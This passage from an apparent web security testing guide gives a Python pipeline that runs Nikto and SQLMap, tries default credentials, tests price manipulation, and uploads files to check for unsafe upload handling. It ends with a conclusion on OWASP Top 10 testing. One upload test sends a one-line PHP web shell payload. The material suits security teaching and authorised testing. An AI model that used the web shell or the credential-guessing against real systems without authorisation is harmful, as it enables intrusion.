        """Run Nikto vulnerability scanner"""
        timeout = self.config['tools']['nikto']['timeout']
        
        cmd = ['nikto', '-h', self.target, '-o', 'nikto_report.html', '-Format', 'html']
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            
            # Parse Nikto output
            vulnerabilities = self.parse_nikto_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'vulnerabilities_found': len(vulnerabilities),
                'vulnerabilities': vulnerabilities[:5]  # First 5
            }
        except subprocess.TimeoutExpired:
            return {'error': f'Nikto scan timed out after {timeout} seconds'}
        except Exception as e:
            return {'error': str(e)}
    
    def run_sqlmap_scan(self):
        """Run SQLMap scanner"""
        risk = self.config['tools']['sqlmap']['risk']
        level = self.config['tools']['sqlmap']['level']
        
        # Test a common parameter
        test_url = f"{self.target}?id=1"
        
        cmd = ['sqlmap', '-u', test_url, '--batch', '--risk', str(risk), 
               '--level', str(level), '--flush-session']
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
            
            # Parse SQLMap output
            sqlmap_result = self.parse_sqlmap_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'result': sqlmap_result
            }
        except subprocess.TimeoutExpired:
            return {'error': 'SQLMap scan timed out after 10 minutes'}
        except Exception as e:
            return {'error': str(e)}
    
    def run_zap_scan(self):
        """Run OWASP ZAP scan"""
        mode = self.config['tools']['zap']['mode']
        
        # ZAP requires different setup
        # For this example, we'll simulate
        zap_result = {
            'status': 'simulated',
            'note': 'In production, integrate with ZAP API',
            'vulnerabilities': [
                {'type': 'XSS', 'severity': 'High', 'url': f'{self.target}/search?q=<script>'},
                {'type': 'CSRF', 'severity': 'Medium', 'url': f'{self.target}/profile'},
                {'type': 'Information Disclosure', 'severity': 'Low', 'url': f'{self.target}/debug'}
            ]
        }
        
        return zap_result
    
    def run_authentication_testing(self):
        """Run authentication testing"""
        auth_results = {}
        
        # Test common authentication weaknesses
        tests = [
            self.test_default_credentials,
            self.test_weak_passwords,
            self.test_password_reset,
            self.test_session_management
        ]
        
        with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
            future_to_test = {executor.submit(test): test.__name__ for test in tests}
            
            for future in concurrent.futures.as_completed(future_to_test):
                test_name = future_to_test[future]
                try:
                    result = future.result()
                    auth_results[test_name] = result
                except Exception as e:
                    auth_results[test_name] = {'error': str(e)}
        
        return auth_results
    
    def test_default_credentials(self):
        """Test for default credentials"""
        # Common default credentials
        defaults = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('admin', '123456'),
            ('root', 'root'),
            ('test', 'test'),
            ('guest', 'guest')
        ]
        
        login_url = f"{self.target}/login"
        results = []
        
        for username, password in defaults[:3]:  # Test first 3
            try:
                response = requests.post(
                    login_url,
                    data={'username': username, 'password': password},
                    timeout=5
                )
                
                if response.status_code == 200 and 'login' not in response.text.lower():
                    results.append({
                        'username': username,
                        'password': password,
                        'status': 'SUCCESS',
                        'evidence': 'Default credentials accepted'
                    })
                else:
                    results.append({
                        'username': username,
                        'password': password,
                        'status': 'FAILED'
                    })
            except Exception as e:
                results.append({'error': str(e)})
        
        return results
    
    def test_weak_passwords(self):
        """Test for weak password policy"""
        # Test if weak passwords are accepted
        weak_passwords = [
            'password',
            '123456',
            'qwerty',
            'letmein',
            'welcome'
        ]
        
        register_url = f"{self.target}/register"
        results = []
        
        for password in weak_passwords[:2]:  # Test first 2
            try:
                response = requests.post(
                    register_url,
                    json={
                        'username': f'test_{int(time.time())}',
                        'password': password,
                        'email': f'test{int(time.time())}@example.com'
                    },
                    timeout=5
                )
                
                if response.status_code == 200:
                    results.append({
                        'password': password,
                        'status': 'ACCEPTED',
                        'evidence': 'Weak password accepted during registration'
                    })
                else:
                    results.append({
                        'password': password,
                        'status': 'REJECTED'
                    })
            except Exception as e:
                results.append({'error': str(e)})
        
        return results
    
    def run_api_testing(self):
        """Run API security testing"""
        api_results = {}
        
        # Discover API endpoints
        endpoints = self.discover_api_endpoints()
        api_results['endpoints'] = endpoints
        
        # Test each endpoint
        tests = [
            self.test_api_authentication,
            self.test_api_rate_limiting,
            self.test_api_input_validation
        ]
        
        for test in tests:
            test_name = test.__name__
            try:
                result = test()
                api_results[test_name] = result
            except Exception as e:
                api_results[test_name] = {'error': str(e)}
        
        return api_results
    
    def discover_api_endpoints(self):
        """Discover API endpoints"""
        endpoints = []
        
        # Common API paths
        common_paths = [
            '/api',
            '/api/v1',
            '/api/v2',
            '/graphql',
            '/rest',
            '/soap'
        ]
        
        for path in common_paths:
            url = f"{self.target}{path}"
            try:
                response = requests.get(url, timeout=5)
                if response.status_code != 404:
                    endpoints.append({
                        'path': path,
                        'status_code': response.status_code,
                        'content_type': response.headers.get('Content-Type', '')
                    })
            except:
                pass
        
        return endpoints
    
    def run_business_logic_tests(self):
        """Run business logic tests"""
        logic_results = {}
        
        tests = [
            self.test_price_manipulation,
            self.test_quantity_manipulation,
            self.test_workflow_bypass
        ]
        
        for test in tests:
            test_name = test.__name__
            try:
                result = test()
                logic_results[test_name] = result
            except Exception as e:
                logic_results[test_name] = {'error': str(e)}
        
        return logic_results
    
    def test_price_manipulation(self):
        """Test for price manipulation vulnerabilities"""
        # Try to change price in cart/checkout
        cart_url = f"{self.target}/api/cart"
        checkout_url = f"{self.target}/api/checkout"
        
        results = []
        
        # Test 1: Negative price
        try:
            response = requests.post(
                cart_url,
                json={'item_id': '123', 'price': -10},
                timeout=5
            )
            
            if response.status_code == 200:
                results.append({
                    'test': 'negative_price',
                    'status': 'VULNERABLE',
                    'evidence': 'Negative price accepted'
                })
        except:
            pass
        
        # Test 2: Very high price
        try:
            response = requests.post(
                checkout_url,
                json={'total': 0.01},  # Try to pay 1 cent
                timeout=5
            )
            
            if response.status_code == 200:
                results.append({
                    'test': 'price_override',
                    'status': 'VULNERABLE',
                    'evidence': 'Price override possible'
                })
        except:
            pass
        
        return results
    
    def run_custom_tests(self):
        """Run custom security tests"""
        custom_results = {}
        
        # Add custom tests here based on application
        custom_tests = [
            self.test_file_upload,
            self.test_xxe,
            self.test_ssrf
        ]
        
        for test in custom_tests:
            test_name = test.__name__
            try:
                result = test()
                custom_results[test_name] = result
            except Exception as e:
                custom_results[test_name] = {'error': str(e)}
        
        return custom_results
    
    def test_file_upload(self):
        """Test file upload vulnerabilities"""
        upload_url = f"{self.target}/upload"
        
        results = []
        
        # Test dangerous file types
        dangerous_files = [
            ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
            ('shell.jsp', '<%@ page import="java.util.*" %>', 'application/jsp'),
            ('shell.asp', '<% Response.Write("Hello") %>', 'application/asp'),
        ]
        
        for filename, content, content_type in dangerous_files[:1]:  # Test first
            files = {'file': (filename, content, content_type)}
            
            try:
                response = requests.post(upload_url, files=files, timeout=5)
                
                if response.status_code == 200:
                    # Check if file was uploaded
                    if 'upload' in response.text.lower() or 'success' in response.text.lower():
                        results.append({
                            'filename': filename,
                            'status': 'VULNERABLE',
                            'evidence': f'Dangerous file {filename} uploaded successfully'
                        })
            except:
                pass
        
        return results
    
    def generate_report(self):
        """Generate comprehensive security report"""
        print("[*] Generating security report...")
        
        report = {
            'metadata': {
                'target': self.target,
                'scan_date': datetime.now().isoformat(),
                'duration': 'N/A',  # Would calculate based on start/end times
                'pipeline_version': '1.0'
            },
            'executive_summary': self.generate_executive_summary(),
            'detailed_findings': self.results,
            'risk_assessment': self.assess_risk(),
            'recommendations': self.generate_recommendations(),
            'appendix': {
                'tools_used': list(self.config['tools'].keys()),
                'scan_configuration': self.config
            }
        }
        
        # Save report in different formats
        output_dir = Path(self.config['reporting']['output_dir'])
        
        if 'json' in self.config['reporting']['format']:
            json_file = output_dir / 'security_report.json'
            with open(json_file, 'w') as f:
                json.dump(report, f, indent=2)
        
        if 'html' in self.config['reporting']['format']:
            html_report = self.generate_html_report(report)
            html_file = output_dir / 'security_report.html'
            with open(html_file, 'w') as f:
                f.write(html_report)
        
        self.report = report
        return report
    
    def generate_executive_summary(self):
        """Generate executive summary"""
        summary = {
            'total_findings': 0,
            'critical_findings': 0,
            'high_findings': 0,
            'medium_findings': 0,
            'low_findings': 0,
            'overall_risk': 'Unknown'
        }
        
        # Count findings from different scans
        # This would be more sophisticated in reality
        
        return summary
    
    def assess_risk(self):
        """Assess overall risk"""
        risk_levels = ['Critical', 'High', 'Medium', 'Low', 'Informational']
        
        # Simple risk assessment
        # In reality, this would analyze all findings
        
        return {
            'overall_risk': 'Medium',
            'confidence': 'Medium',
            'factors_considered': ['Vulnerabilities found', 'Data sensitivity', 'Attack surface']
        }
    
    def generate_recommendations(self):
        """Generate security recommendations"""
        recommendations = {
            'immediate': [
                'Patch critical vulnerabilities within 24 hours',
                'Change default credentials immediately',
                'Implement WAF rules for detected attack patterns'
            ],
            'short_term': [
                'Complete vulnerability remediation within 7 days',
                'Implement security monitoring and alerting',
                'Conduct developer security training'
            ],
            'long_term': [
                'Implement secure SDLC processes',
                'Regular security testing and penetration testing',
                'Continuous security monitoring and improvement'
            ]
        }
        
        return recommendations
    
    def generate_html_report(self, report_data):
        """Generate HTML report"""
        html_template = """
        <!DOCTYPE html>
        <html>
        <head>
            <title>Security Assessment Report</title>
            <style>
                body { font-family: Arial, sans-serif; margin: 40px; }
                h1 { color: #333; }
                h2 { color: #555; border-bottom: 1px solid #ddd; padding-bottom: 10px; }
                .critical { color: #d9534f; font-weight: bold; }
                .high { color: #f0ad4e; }
                .medium { color: #5bc0de; }
                .low { color: #5cb85c; }
                table { border-collapse: collapse; width: 100%; margin-bottom: 20px; }
                th, td { border: 1px solid #ddd; padding: 8px; text-align: left; }
                th { background-color: #f2f2f2; }
                .summary-box { background: #f8f9fa; border: 1px solid #dee2e6; padding: 20px; border-radius: 5px; }
            </style>
        </head>
        <body>
            <h1>Security Assessment Report</h1>
            <div class="summary-box">
                <h2>Executive Summary</h2>
                <p><strong>Target:</strong> {target}</p>
                <p><strong>Scan Date:</strong> {scan_date}</p>
                <p><strong>Overall Risk:</strong> <span class="{risk_class}">{overall_risk}</span></p>
            </div>
            
            <h2>Findings Summary</h2>
            <table>
                <tr>
                    <th>Severity</th>
                    <th>Count</th>
                </tr>
                <tr><td class="critical">Critical</td><td>{critical_count}</td></tr>
                <tr><td class="high">High</td><td>{high_count}</td></tr>
                <tr><td class="medium">Medium</td><td>{medium_count}</td></tr>
                <tr><td class="low">Low</td><td>{low_count}</td></tr>
            </table>
            
            <h2>Recommendations</h2>
            <h3>Immediate Actions (24 hours)</h3>
            <ul>
                {immediate_recs}
            </ul>
            
            <h3>Short Term Actions (7 days)</h3>
            <ul>
                {short_term_recs}
            </ul>
            
            <h3>Long Term Actions (30+ days)</h3>
            <ul>
                {long_term_recs}
            </ul>
            
            <hr>
            <p><em>Report generated by Security Testing Pipeline v1.0</em></p>
        </body>
        </html>
        """
        
        # Fill template
        risk_class = report_data['risk_assessment']['overall_risk'].lower()
        
        filled_html = html_template.format(
            target=report_data['metadata']['target'],
            scan_date=report_data['metadata']['scan_date'],
            overall_risk=report_data['risk_assessment']['overall_risk'],
            risk_class=risk_class,
            critical_count=report_data['executive_summary']['critical_findings'],
            high_count=report_data['executive_summary']['high_findings'],
            medium_count=report_data['executive_summary']['medium_findings'],
            low_count=report_data['executive_summary']['low_findings'],
            immediate_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['immediate']),
            short_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['short_term']),
            long_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['long_term'])
        )
        
        return filled_html

# Usage
pipeline = SecurityTestingPipeline(
    target="http://target.com",
    config_file="security_config.yaml"  # Optional
)

results = pipeline.run_pipeline()

print(f"\n{'='*60}")
print("SECURITY TESTING PIPELINE COMPLETE")
print(f"{'='*60}")

# Print summary
if 'Reporting' in results and 'report' in results['Reporting']:
    report = results['Reporting']['report']
    print(f"\nReport generated: {pipeline.config['reporting']['output_dir']}/")
    print(f"Overall Risk: {report['risk_assessment']['overall_risk']}")

# Check for critical findings
print(f"\nPipeline Steps Completed:")
for step, result in results.items():
    if isinstance(result, dict) and 'error' not in result:
        print(f"  ✓ {step}")
    else:
        print(f"  ✗ {step} (Error)")

print(f"\n[*] Detailed reports available in {pipeline.config['reporting']['output_dir']}/")

Conclusion

This comprehensive guide has covered advanced techniques, tools, and methodologies for testing OWASP Top 10 vulnerabilities. Key takeaways:

1. Automation is Critical

  • Integrate security testing into CI/CD pipelines
  • Use tools like ZAP, Nuclei, and custom scripts
  • Implement continuous security monitoring

2. Think Beyond Basic Tests

  • Business logic flaws require creative testing
  • Race conditions need specialized tools
  • SSRF requires multiple bypass techniques

3. Context Matters

  • Understand the application's business purpose
  • Test based on risk (sensitive data, functionality)
  • Consider the technology stack

4. Combine Multiple Approaches

  • Automated scanning + manual testing
  • Static + dynamic analysis
  • Black-box + grey-box testing

5. Stay Updated

  • New vulnerabilities emerge constantly
  • Tools and techniques evolve
  • Follow security research and updates

Essential Next Steps:

  1. Implement a Security Testing Pipeline like the one shown in Chapter 11
  2. Create Custom Tooling for your specific technology stack
  3. Regularly Update Your Toolkit with new tools and techniques
  4. Train Your Team on advanced security testing methods
  5. Establish Metrics to measure security testing effectiveness

Remember: Security testing is an ongoing process, not a one-time event. Regular assessments, combined with proper remediation and monitoring, create a robust security posture.


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment